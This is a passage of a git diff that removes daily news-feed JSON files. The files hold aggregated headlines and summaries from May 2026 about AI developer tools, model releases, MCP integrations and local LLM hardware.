it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing)", - "category": "ai_tools" - }, - { - "title": "Anthropic just confirmed why 90% of non-coding AI agents fail in production", - "url": "https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T20:11:57.000Z", - "summary": "Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *\"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet.\"* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. 
* Why the Rest of the World is Hard: A sales or marketing agent doesn’t…", - "category": "ai_tools" - }, - { - "title": "[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]", - "url": "https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/", - "source": "Reddit r/MachineLearning", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T17:02:55.000Z", - "summary": "I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/)", - "category": "ai_research" - }, - { - "title": "Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T14:54:45.000Z", - "summary": "I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. 
(No idea how much system ram I will get, but I guess they are a bit flexible on this). \\- I want to build a inference endpoint that can handle up to 30 users. \\- I want a fairly reasonable big context, say 131,072-262,144. \\- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. \\- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \\- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \\- If running on llama.cpp I would probably use UD-Q6\\_K\\_XL or UD-Q8\\_K\\_XL quant from Unsloth. \\- If running on vllm I have no idea on what quant to use? Some advice here would be great. \\- Is there any good tool to benchmark \"concurrent users\"?", - "category": "ai_models" - }, - { - "title": "litellm vs any-llm (otari)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-27T14:09:07.000Z", - "summary": "I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). 
Was wondering if others have already done similar and have positive or negative experiences", - "category": "ai_models" - }, - { - "title": "Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets", - "url": "https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-27T10:05:58.000Z", - "summary": "Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. 
* **Smart Local Delegation**: To keep you c…", - "category": "ai_tools" - }, - { - "title": "Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.78, - "date": "2026-05-27T16:57:57.000Z", - "summary": "Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. \"This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. Why the code is shaped the way it is. Stops the model from \"fixing\" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. 
We ran a time-travel experiment on Django (542 files): scored every file, then…", - "category": "ai_tools" - }, - { - "title": "Millions of AI agents imperiled by critical vulnerability in open source package", - "url": "https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/", - "source": "Ars Technica AI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.74, - "date": "2026-05-27T05:18:30.012Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-05-27T23:24:48.000Z", - "summary": "I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \\- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. 
;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY)", - "category": "ai_models" - }, - { - "title": "BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]", - "url": "https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-27T21:53:42.000Z", - "summary": "\\[R\\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. 
Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me…", - "category": "ai_research" - }, - { - "title": "Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)", - "url": "https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-27T19:07:02.000Z", - "summary": "Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. 
More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l…", - "category": "creative_tools" - }, - { - "title": "Qwen3.6 huge quality gain from Q4 to Q6 for coding agent", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T18:32:18.000Z", - "summary": "So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! 
Local coding agents are a thing and they work 😎", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-28.json b/data/news-feed-2026-05-28.json deleted file mode 100644 index e434f79..0000000 --- a/data/news-feed-2026-05-28.json +++ /dev/null @@ -1,271 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.425Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-28", - "article_count": 15, - "archived_story_count": 714, - "articles": [ - { - "title": "Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy", - "url": "https://x.com/ClaudeCodeLog/status/2059802880811434228", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T12:12:48.493Z", - "summary": "Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space.", - "category": "ai_tools" - }, - { - "title": "I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T03:36:12.000Z", - "summary": "I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. 
Sometimes Codex or Cursor does. Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. It can help you: \\- see where your skills and MCPs live \\- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \\- standardize around a canonical definition of each skill/MCP \\- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex)", - "category": "ai_tools" - }, - { - "title": "MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock", - "url": "https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-05-28T08:48:48.000Z", - "summary": "While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\\_desktop\\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. 
Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how?", - "category": "ai_tools" - }, - { - "title": "Introducing Claude Opus 4.8", - "url": "https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-28T16:52:23.000Z", - "summary": "We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. 
Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8)", - "category": "ai_tools" - }, - { - "title": "I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T15:23:21.000Z", - "summary": "I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. The agent can't write code without an approved plan, can't skip tests, can't say \"tests pass\" without running static analysis. These are…", - "category": "ai_models" - }, - { - "title": "Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. 
Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T14:21:49.000Z", - "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", - "category": "ai_research" - }, - { - "title": "Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 
3M papers, free, looking for feedback [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T13:05:39.000Z", - "summary": "Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use?", - "category": "ai_research" - }, - { - "title": "SDXL image generation now works on iPhone. 
The bug that blocked it for months was a missing file check", - "url": "https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T13:03:34.000Z", - "summary": "We've been building \\[Off Grid\\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. Turns out: SDXL models ship in two UNet layouts: \\- Monolithic: one big \\`Unet.mlmodelc\\` file \\- Chunked: \\`UnetChunk1.mlmodelc\\` + \\`UnetChunk2.mlmodelc\\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said \"model invalid\" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. 
It's free and open source: \\- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \\- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \\- Android (SD…", - "category": "creative_tools" - }, - { - "title": "DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework", - "url": "https://x.com/isaacbmiller1/status/2059828079371894786", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T12:12:48.493Z", - "summary": "Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production.", - "category": "ai_tools" - }, - { - "title": "Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets", - "url": "https://x.com/TencentAI_News/status/2059827192964808922", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T12:12:47.642Z", - "summary": "Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. 
The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf.", - "category": "ai_tools" - }, - { - "title": "Local run for multi users: which software set?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-28T11:06:34.000Z", - "summary": "Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? 
Thank for any help!", - "category": "ai_models" - }, - { - "title": "OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewallsOutbound-only HTTPS tunnels secure the connection to OpenAI.", - "url": "https://www.digg.com/ai/28n5w7d2", - "source": "Digg AI", - "tags": [ - "mcp", - "product_launch" - ], - "matching_tags": [ - "mcp", - "product_launch" - ], - "importance": 1, - "date": "2026-05-28T05:18:10.307Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation daysIt features GPU-accelerated physics solvers and path-traced rendering", - "url": "https://www.digg.com/ai/tuo1sird", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-28T05:18:10.290Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-28T01:27:29.000Z", - "summary": "Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet.", - "category": "ai_models" - }, - { - "title": "GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? 
(5 devs, agentic coding)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-28T01:24:20.000Z", - "summary": "Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \\~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \\~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. 
Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem…", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-29.json b/data/news-feed-2026-05-29.json deleted file mode 100644 index f69c931..0000000 --- a/data/news-feed-2026-05-29.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.652Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-29", - "article_count": 15, - "archived_story_count": 468, - "articles": [ - { - "title": "Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents", - "url": "https://x.com/runtimewire/status/2059782827927810437", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T12:05:45.033Z", - "summary": "Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration.", - "category": "ai_tools" - }, - { - "title": "Kling AI Skill Launches for Agent Workflows — Text-to-Video, 4K Images, and Cross-Scene Consistency in Claude and Cursor", - "url": "https://x.com/MayorKingAI/status/2044455291664695688", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T12:05:45.033Z", - "summary": "Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. 
Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw.", - "category": "ai_tools" - }, - { - "title": "Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes", - "url": "https://x.com/_adishj/status/2060028771399500237", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-28T17:59:08.283Z", - "summary": "Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows.", - "category": "ai_tools" - }, - { - "title": "X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI", - "url": "https://www.digg.com/ai/v4d0ka2f", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.045Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks", - "url": "https://www.digg.com/ai/6gzrebez", - "source": "Digg AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-29T15:24:17.038Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages", - "url": "https://x.com/Carles_Reina/status/2060035887946248616", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": 